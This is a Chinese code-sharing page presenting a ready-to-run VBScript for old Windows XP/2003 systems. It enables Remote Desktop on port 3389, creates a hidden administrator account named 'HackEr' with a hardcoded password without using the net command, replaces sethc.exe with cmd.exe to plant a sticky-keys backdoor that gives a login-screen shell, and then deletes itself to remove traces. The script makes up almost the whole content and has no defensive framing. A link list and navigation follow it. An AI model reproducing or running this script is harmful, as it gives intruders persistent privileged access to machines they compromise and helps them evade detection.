xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs


复制代码 代码如下:

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)



相关阅读:
javascript在事件监听方面的兼容性小结
php获取mysql版本的几种方法小结
PHP学习宝典-第六章
如何用javascript判断录入的日期是否合法
Linux防火墙该如何设置
针对class、id所做的CSS HACK
关于Aptana Studio生成自动备份文件的解决办法
ext 同步和异步示例代码
如何在linux下使用u盘
建站选择CMS一定要谨慎
浏览器发展/CSS布局/怎样运用?
创造收藏夹中的个性化图标
一个判断email合法性的函数[非正则]
使用PHP编写基于Web的文件管理系统
快速导航
PHP MySQL HTML CSS JavaScript MSSQL AJAX .NET JSP Linux Mac ASP 服务器 SQL jQuery C# C++ java Android IOS oracle MongoDB SQLite wamp 交通频道 作文范文 致女神 青年文化节开幕式致词 晨跑所思 人教版四年级上册数学教学计划 学校庆建党90周年演讲稿 优秀学生诗歌《毛绒玩具》 笑对烦恼350字 爸爸寿辰贺词 如果有来生... 圣诞节送给客户的节日祝福语短信 我有一个地球仪100字 这个冬天不冷 高中高二作文900字:改写《石壕吏》 用社会实践调研来实现我们立下的承诺 依法治国诠释着现代治理的题中之义 小学六年级作文450字:500年后的地球 蓝色之恋作文3000字 小学五年级作文400字:扔垃圾 市农信社反洗钱工作自查报告 发挥妇女在新农村建设中作用调研建议 《爸爸变成甲虫飞走了》读后感 两头不讨好,你做吗? 2015小学生二十年后再相会作文精选 2014中国梦主题教育活动总结 月光下的随感 郭沫若女神读后感 男神必看搞笑祝福语 生活需要感知 2015国庆节祝福语客户 读小王子有感300字 我心中的春天400字 2010庚寅春联 小学三年级作文400字:野外的春天 11月入党程序大全 服装连锁加盟店的销售绝招 《渴望读书的大眼睛》教案4 幻想的朋友 读【鲁滨逊漂流记】有感 中国梦的励志文章:趁着年轻,走出去 不可思议书之冒险(原创)第二章作文1500字 端午节吃粽子的来历作文 让我们,从现在开始作文500字 我们班级作文800字 关山月李白赏析 最虐心的16个句子 2015教师有偿补课检讨书 和春天有关的作文250字 少先队申请书 狂歌劲舞,同庆散文论坛四百万 发生在“语文月”的故事500字

Copyright © 2016 phpStudy |